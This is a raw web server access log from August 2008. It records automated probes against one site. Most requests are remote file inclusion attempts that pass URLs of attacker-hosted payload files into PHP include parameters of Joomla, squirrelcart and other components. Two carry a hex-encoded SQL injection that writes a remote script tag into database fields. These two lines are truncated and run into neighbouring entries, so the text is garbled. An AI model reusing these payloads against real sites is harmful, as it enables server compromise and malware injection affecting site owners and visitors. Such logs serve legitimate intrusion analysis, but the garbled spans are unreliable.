80.67.20.130 - - [21/Aug/2008:09:42:33 -0700] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [21/Aug/2008:09:43:20 -0700] "GET /logs/access_080722.log//include/admin.lib.inc.php?site_path=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [21/Aug/2008:09:43:27 -0700] "GET /logs/access_080519.log//include/admin.lib.inc.php?site_path=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:09:43:45 -0700] "GET ///squirrelcart/cart_content.php?cart_isp_root=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:09:43:46 -0700] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.248.62.98 - - [21/Aug/2008:09:43:48 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kosherkash.net/public/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
213.248.62.98 - - [21/Aug/2008:09:43:48 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kosherkash.net/public/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
80.67.19.125 - - [21/Aug/2008:09:44:01 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.125 - - [21/Aug/2008:09:44:02 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.83.209.18 - - [21/Aug/2008:09:44:08 -0700] "GET /logs/access_080413.log//bemarket/postscript/postscript.php?p_mode=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
219.117.239.114 - - [21/Aug/2008:09:44:30 -0700] "GET /logs/access_080519.log//include/admin.lib.inc.php?site_path=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [21/Aug/2008:09:44:30 -0700] "GET /logs/access_080519.log//include/admin.lib.inc.php?site_path=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.89.27.247 - - [21/Aug/2008:09:44:46 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.27.247 - - [21/Aug/2008:09:44:46 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.55.211.27 - - [21/Aug/2008:09:45:03 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.27 - - [21/Aug/2008:09:45:03 -0700] "GET /presto/?N=A HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
69.42.218.66 - - [21/Aug/2008:09:45:32 -0700] "GET /logs/access_080226.log/index.php?go=http://securessh.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.218.66 - - [21/Aug/2008:09:45:32 -0700] "GET /logs/index.php?go=http://securessh.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.218.66 - - [21/Aug/2008:09:45:34 -0700] "GET /index.php?go=http://securessh.t35.com/id.txt??? HTTP/1.1" 200 9865 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.218.66 - - [21/Aug/2008:09:45:48 -0700] "GET /logs/access_080720.log/index.php?go=http://securessh.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.83.123.116 - - [21/Aug/2008:09:46:20 -0700] "GET /logs/access_080309.log?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432lingeriestoreusa/us2:64.66.249.67.135 - - [21/Aug/2008:09:46:51 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0077.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" "dmulk.com"
200.105.208.186 - - [21/Aug/2008:09:46:51 -0700] "GET /logs/access_080421.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://servitis-web.com/solution/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:09:46:51 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://servitis-web.com/solution/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:09:46:51 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://servitis-web.com/solution/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:09:46:51 -0700] "GET /logs/access_080227.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://servitis-web.com/solution/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.83.123.116 - - [21/Aug/2008:09:46:58 -0700] "GET /logs/access_080309.log?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B4043lingeriestoreusa/us2:64.69.89.27.247 - - [21/Aug/2008:09:47:02 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.27.247 - - [21/Aug/2008:09:47:02 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.149.115.2 - - [21/Aug/2008:09:47:36 -0700] "GET /logs/access_080806.log/lostpasswd.php?env[include_prefix]=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.149.115.2 - - [21/Aug/2008:09:47:36 -0700] "GET /lostpasswd.php?env[include_prefix]=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.149.115.2 - - [21/Aug/2008:09:47:36 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.149.115.2 - - [21/Aug/2008:09:47:38 -0700] "GET /logs/access_080329.log/lostpasswd.php?env[include_prefix]=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.180.11.132 - - [21/Aug/2008:09:47:39 -0700] "GET //efos_news/index1.php?str=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.180.11.132 - - [21/Aug/2008:09:47:39 -0700] "GET /logs/access_080515.log//efos_news/index1.php?str=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.180.11.132 - - [21/Aug/2008:09:47:39 -0700] "GET /logs//efos_news/index1.php?str=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:09:47:51 -0700] "GET /logs/access_080227.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://servitis-web.com/solution/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.225 - - [21/Aug/2008:09:47:59 -0700] "GET / HTTP/1.0" 200 9797 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:09:48:01 -0700] "GET /logs/access_080421.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://servitis-web.com/solution/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:09:48:01 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://servitis-web.com/solution/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:09:48:01 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://servitis-web.com/solution/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.186 - - [21/Aug/2008:09:48:01 -0700] "GET / HTTP/1.0" 200 9797 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.67.19.125 - - [21/Aug/2008:09:48:03 -0700] "GET /logs/access_080621.log//squirrelcart/cart_content.php?cart_isp_root=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.79.182.204 - - [21/Aug/2008:09:48:20 -0700] "GET /logs/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=%22Poweredhttp://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.79.182.204 - - [21/Aug/2008:09:48:20 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=%22Poweredhttp://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.79.130 - - [21/Aug/2008:09:48:48 -0700] "GET /logs/access_080413.log//bemarket/postscript/postscript.php?p_mode=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:09:48:51 -0700] "GET /logs/access_080421.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://servitis-web.com/solution/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.115.37.130 - - [21/Aug/2008:09:48:51 -0700] "GET /logs/access_080118.log/index.php?url=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.115.37.130 - - [21/Aug/2008:09:48:52 -0700] "GET /index.php?url=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 200 9886 "-" "libwww-perl/5.805" "www.dmulk.com"
212.115.37.130 - - [21/Aug/2008:09:48:52 -0700] "GET /logs/index.php?url=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:09:49:16 -0700] "GET /logs/errors.php?error=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:09:49:16 -0700] "GET /errors.php?error=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:09:49:19 -0700] "GET /logs/errors.php?error=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:09:49:19 -0700] "GET /errors.php?error=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.84.19.133 - - [21/Aug/2008:09:49:23 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../idfast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:09:49:38 -0700] "GET /logs/errors.php?error=http://marlyping.free.fr/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
121.180.11.132 - - [21/Aug/2008:09:49:39 -0700] "GET /logs/access_080715.log//efos_news/index1.php?str=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.122.31.174 - - [21/Aug/2008:09:49:55 -0700] "GET //efos_news/index1.php?str=http://erotica.ltd.uk/edit/help01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.31.174 - - [21/Aug/2008:09:49:55 -0700] "GET /logs/access_080515.log//efos_news/index1.php?str=http://erotica.ltd.uk/edit/help01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.31.174 - - [21/Aug/2008:09:49:55 -0700] "GET /logs//efos_news/index1.php?str=http://erotica.ltd.uk/edit/help01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:09:50:03 -0700] "GET /logs/errors.php?error=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:09:50:03 -0700] "GET /errors.php?error=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:09:50:25 -0700] "GET /logs/errors.php?error=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:09:50:25 -0700] "GET /errors.php?error=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.9.3.130 - - [21/Aug/2008:09:50:43 -0700] "GET //components/com_user/controller.php?option=http://www.velvetgold.net/images/space.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.9.3.130 - - [21/Aug/2008:09:50:43 -0700] "GET /logs/access_080218.log//components/com_user/controller.php?option=http://www.velvetgold.net/images/space.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.9.3.130 - - [21/Aug/2008:09:50:43 -0700] "GET //components/com_user/controller.php?option=http://www.velvetgold.net/images/space.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.9.3.130 - - [21/Aug/2008:09:50:43 -0700] "GET /logs//components/com_user/controller.php?option=http://www.velvetgold.net/images/space.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.9.3.130 - - [21/Aug/2008:09:50:44 -0700] "GET /logs/access_080214.log//components/com_user/controller.php?option=http://www.velvetgold.net/images/space.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.31.174 - - [21/Aug/2008:09:51:49 -0700] "GET /logs/access_080715.log//efos_news/index1.php?str=http://erotica.ltd.uk/edit/help01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.97.107.211 - - [21/Aug/2008:09:52:11 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.topyn.com/bajo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.97.107.211 - - [21/Aug/2008:09:52:11 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.topyn.com/bajo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.97.107.211 - - [21/Aug/2008:09:52:56 -0700] "GET /logs/access_080722.log//index.php?DOCUMENT_ROOT=http://www.topyn.com/bajo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:09:52:57 -0700] "GET /logs/access_080610.log%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://servitis-web.com/solution/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.83.209.18 - - [21/Aug/2008:09:53:04 -0700] "GET /logs/access_080808.log%20//bemarket/postscript/postscript.php?p_mode=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.67.19.125 - - [21/Aug/2008:09:53:08 -0700] "GET /logs/access_080531.log//squirrelcart/cart_content.php?cart_isp_root=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.125 - - [21/Aug/2008:09:53:10 -0700] "GET /logs/access_080526.log//squirrelcart/cart_content.php?cart_isp_root=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.83.209.18 - - [21/Aug/2008:09:53:14 -0700] "GET /logs/access_080809.log%20//bemarket/postscript/postscript.php?p_mode=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:09:53:54 -0700] "GET /logs/access_080610.log%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://servitis-web.com/solution/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.130 - - [21/Aug/2008:09:53:56 -0700] "GET /logs/access_080808.log%20//bemarket/postscript/postscript.php?p_mode=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [21/Aug/2008:09:53:57 -0700] "GET /logs/access_080809.log%20//bemarket/postscript/postscript.php?p_mode=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.129.97.30 - - [21/Aug/2008:09:53:58 -0700] "GET /logs/access_080801.log//include/admin.lib.inc.php?site_path=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [21/Aug/2008:09:54:00 -0700] "GET /logs/access_080718.log//include/admin.lib.inc.php?site_path=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.11 - - [21/Aug/2008:09:55:58 -0700] "GET /logs/access_080724.log/expanded.php?conf=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.11 - - [21/Aug/2008:09:55:58 -0700] "GET /expanded.php?conf=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.11 - - [21/Aug/2008:09:55:59 -0700] "GET /logs/expanded.php?conf=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.11 - - [21/Aug/2008:09:56:57 -0700] "GET /logs/access_080105.log/expanded.php?conf=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.83.209.18 - - [21/Aug/2008:09:57:00 -0700] "GET /logs/access_080803.log//bemarket/postscript/postscript.php?p_mode=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:09:57:12 -0700] "GET /logs/access_080209.log///squirrelcart/cart_content.php?cart_isp_root=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:09:57:43 -0700] "GET /logs/access_080209.log///squirrelcart/cart_content.php?cart_isp_root=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:09:57:49 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:09:57:49 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.149.115.2 - - [21/Aug/2008:09:57:56 -0700] "GET /logs/access_080806.log/lostpasswd.php?env[include_prefix]=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.149.115.2 - - [21/Aug/2008:09:57:56 -0700] "GET /lostpasswd.php?env[include_prefix]=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.149.115.2 - - [21/Aug/2008:09:57:56 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.149.115.2 - - [21/Aug/2008:09:57:58 -0700] "GET /logs/access_080329.log/lostpasswd.php?env[include_prefix]=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:58:33 -0700] "GET /logs/access_080811.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:58:33 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:58:33 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.240.146 - - [21/Aug/2008:09:58:42 -0700] "GET /logs/access_080209.log//member_Login.php?add_user_pass=http://www.psgpoland.com//cmstest/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [21/Aug/2008:09:58:43 -0700] "GET /logs/access_080209.log//member_Login.php?add_user_pass=http://www.psgpoland.com//cmstest/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [21/Aug/2008:09:58:43 -0700] "GET //member_Login.php?add_user_pass=http://www.psgpoland.com//cmstest/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [21/Aug/2008:09:58:43 -0700] "GET /logs//member_Login.php?add_user_pass=http://www.psgpoland.com//cmstest/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [21/Aug/2008:09:58:44 -0700] "GET /logs//member_Login.php?add_user_pass=http://www.psgpoland.com//cmstest/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [21/Aug/2008:09:58:44 -0700] "GET //member_Login.php?add_user_pass=http://www.psgpoland.com//cmstest/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.11 - - [21/Aug/2008:09:58:46 -0700] "GET /logs/expanded.php?conf=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [21/Aug/2008:09:58:46 -0700] "GET /logs//member_Login.php?add_user_pass=http://warezmania.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.11 - - [21/Aug/2008:09:58:46 -0700] "GET /expanded.php?conf=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [21/Aug/2008:09:58:47 -0700] "GET /logs/access_080209.log//member_Login.php?add_user_pass=http://warezmania.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [21/Aug/2008:09:58:47 -0700] "GET //member_Login.php?add_user_pass=http://warezmania.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [21/Aug/2008:09:58:59 -0700] "GET //member_Login.php?add_user_pass=http://www.psgpoland.com//cmstest/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [21/Aug/2008:09:58:59 -0700] "GET /logs//member_Login.php?add_user_pass=http://www.psgpoland.com//cmstest/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [21/Aug/2008:09:58:59 -0700] "GET /logs/access_080209.log//member_Login.php?add_user_pass=http://www.psgpoland.com//cmstest/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [21/Aug/2008:09:59:04 -0700] "GET /logs/access_080209.log//member_Login.php?add_user_pass=http://warezmania.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [21/Aug/2008:09:59:04 -0700] "GET //member_Login.php?add_user_pass=http://warezmania.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [21/Aug/2008:09:59:05 -0700] "GET /logs//member_Login.php?add_user_pass=http://warezmania.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [21/Aug/2008:09:59:29 -0700] "GET /logs/access_080219.log//member_Login.php?add_user_pass=http://www.psgpoland.com//cmstest/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [21/Aug/2008:09:59:29 -0700] "GET /logs/access_080219.log//member_Login.php?add_user_pass=http://www.psgpoland.com//cmstest/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
